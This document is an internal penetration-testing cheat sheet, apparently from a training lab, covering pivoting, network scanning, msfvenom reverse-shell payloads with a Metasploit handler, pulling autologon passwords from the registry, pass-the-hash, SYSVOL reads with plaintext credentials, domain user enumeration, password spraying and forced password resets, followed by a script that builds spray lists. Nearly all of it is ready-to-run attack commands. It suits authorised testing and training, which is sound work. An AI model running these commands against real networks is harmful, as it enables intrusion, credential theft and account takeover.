Internal Pentest

When inside the target network:

  • Start ligolo for pivoting.

  • Run nmap/fping scan to find live hosts.

  • Find open ports on the hosts.

# Scan for live hosts in the network
# fping -a prints only the alive addresses; the "unreachable" noise goes to stderr
fping -a -g <subnet> 2>/dev/null > live_hosts
# nmap alternative: -oG (grepable) output is easy to turn into a plain host list,
# whereas -oN output is a report and cannot be fed back into -iL
nmap -sn -vv <subnet> -oG live_hosts.gnmap
awk '/Status: Up/ {print $2}' live_hosts.gnmap > live_hosts

# Scan top 100 ports slowly (-T2) to avoid dropped packets in the tunnel
# -Pn skips host discovery: these hosts are already known to be up, and ICMP is often filtered internally
nmap -F -iL live_hosts -T2 -vv -Pn -oN nmap_scan

  • Enumerate common services.

  • Start by trying to read SMB or NFS shares.

  • Spend time on any HTTP sites you find; a web application is often the first foothold on a host.

Found new creds?

  • Enumerate shares again with them.

  • Spray the password against the users whose password you don't have yet (one password per round, and check the lockout policy first so you don't lock the domain out).

  • Try to re-use it everywhere: every host and every service that takes a password.

# Staged meterpreter payloads for Windows and Linux targets
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe -o shell.exe

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f elf -o shell.elf

# Matching handler in msfconsole: payload, LHOST and LPORT must match the msfvenom values
# When pivoting, the target must be able to reach LHOST:LPORT; with ligolo that means
# adding a listener on the agent that forwards the port back to you
# (ligolo-ng: listener_add --addr 0.0.0.0:<your_port> --to 127.0.0.1:<your_port>)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT <your_port>
run

# Autologon creds live in the Winlogon key; the username alone is not much use, so query DefaultPassword too
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

# Pass-the-hash with a local Administrator NT hash (--local-auth: authenticate against the host's SAM, not the domain)
netexec smb 172.16.8.20 -u 'Administrator' -H '0e20798f695ab0d04bc138b22344cea8' --local-auth

# Read SYSVOL on the DC with domain creds (-U 'DOMAIN\user%password'); look for scripts and GPP files with embedded creds
smbclient -U 'inlanefreight.local\hporter%Gr8hambino!' //172.16.8.3/SYSVOL

# Dump the domain users with valid creds, then cut the DOMAIN\user column (field 5) into a clean list for spraying
crackmapexec smb <dc_ip> -u '<user>' -p '<password>' --users > dusers
awk '{print $5}' dusers | sort -u

# Reset another user's password over RPC with hporter's creds (needs a right such as ForceChangePassword or GenericAll over ssmalls)
# This is destructive: the old password is gone, so only do it when the rules of engagement allow it and record what you changed
net rpc password "ssmalls" 'Gr8hambino!' -U "inlanefreight.local"/"hporter"%'Gr8hambino!' -S "dc01.inlanefreight.local"
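The "Found new creds?" checklist and the crackmapexec --users line above both come down to the same chore: turning raw tool output into clean target lists before spraying. The script below is an added example (not from the original page) that does exactly that. It assumes nmap was run with -oG and crackmapexec/netexec with --users; both sample outputs are constructed to match those formats, not captured from a real engagement, and the spray command is printed rather than executed.

```bash
#!/usr/bin/env bash
# Added example: build host and user lists from tool output, then form the spray command.
# Assumptions: nmap -sn was run with -oG, crackmapexec smb was run with --users.
# All sample data below is constructed to match those output formats.
set -eu

WORK=$(mktemp -d)

# Constructed sample of: nmap -sn -oG live_hosts.gnmap 172.16.8.0/24
cat > "$WORK/live_hosts.gnmap" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -sn -oG live_hosts.gnmap 172.16.8.0/24
Host: 172.16.8.3 (dc01.inlanefreight.local)  Status: Up
Host: 172.16.8.20 ()  Status: Up
Host: 172.16.8.50 ()  Status: Down
# Nmap done -- 256 IP addresses (2 hosts up) scanned in 5.12 seconds
EOF

# Constructed sample of: crackmapexec smb 172.16.8.3 -u hporter -p 'Gr8hambino!' --users > dusers
cat > "$WORK/dusers" <<'EOF'
SMB   172.16.8.3  445  DC01  [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:inlanefreight.local) (signing:True) (SMBv1:False)
SMB   172.16.8.3  445  DC01  [+] inlanefreight.local\hporter:Gr8hambino!
SMB   172.16.8.3  445  DC01  [*] Enumerated domain user(s)
SMB   172.16.8.3  445  DC01  inlanefreight.local\Administrator  badpwdcount: 0 desc: Built-in account for administering the computer/domain
SMB   172.16.8.3  445  DC01  inlanefreight.local\ssmalls        badpwdcount: 1 desc:
SMB   172.16.8.3  445  DC01  inlanefreight.local\hporter        badpwdcount: 0 desc:
EOF

# Only "Status: Up" host lines matter for the port scan; field 2 is the address.
live_hosts_from_gnmap() {
    awk '/^Host:/ && /Status: Up/ {print $2}' "$1"
}

# Field 5 of a user line is DOMAIN\user; status lines carry [*] or [+] there instead,
# so require a backslash in field 5 and the badpwdcount: marker in field 6.
# The domain prefix is stripped so the list works with -u <file> on any tool.
users_from_cme() {
    awk '$5 ~ /\\/ && $6 == "badpwdcount:" { sub(/^.*\\/, "", $5); print $5 }' "$1" | sort -u
}

# One password against every user on every host. --continue-on-success keeps
# going after the first valid login instead of stopping there.
spray_cmd() {
    # $1 hosts file, $2 users file, $3 password
    printf "netexec smb %s -u %s -p '%s' --continue-on-success\n" "$1" "$2" "$3"
}

live_hosts_from_gnmap "$WORK/live_hosts.gnmap" > "$WORK/live_hosts"
users_from_cme "$WORK/dusers" > "$WORK/users"

echo "[*] live hosts:"; cat "$WORK/live_hosts"
echo "[*] users:";      cat "$WORK/users"
# Check the lockout threshold before spraying so one round cannot lock accounts.
echo "[*] check lockout policy first: netexec smb $WORK/live_hosts -u hporter -p 'Gr8hambino!' --pass-pol"
echo "[*] spray: $(spray_cmd "$WORK/live_hosts" "$WORK/users" 'Gr8hambino!')"
```

The badpwdcount column in the --users output is worth reading before you spray: a user already at the threshold minus one will be locked out by your attempt, so drop such accounts from the list or wait for the observation window to pass.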
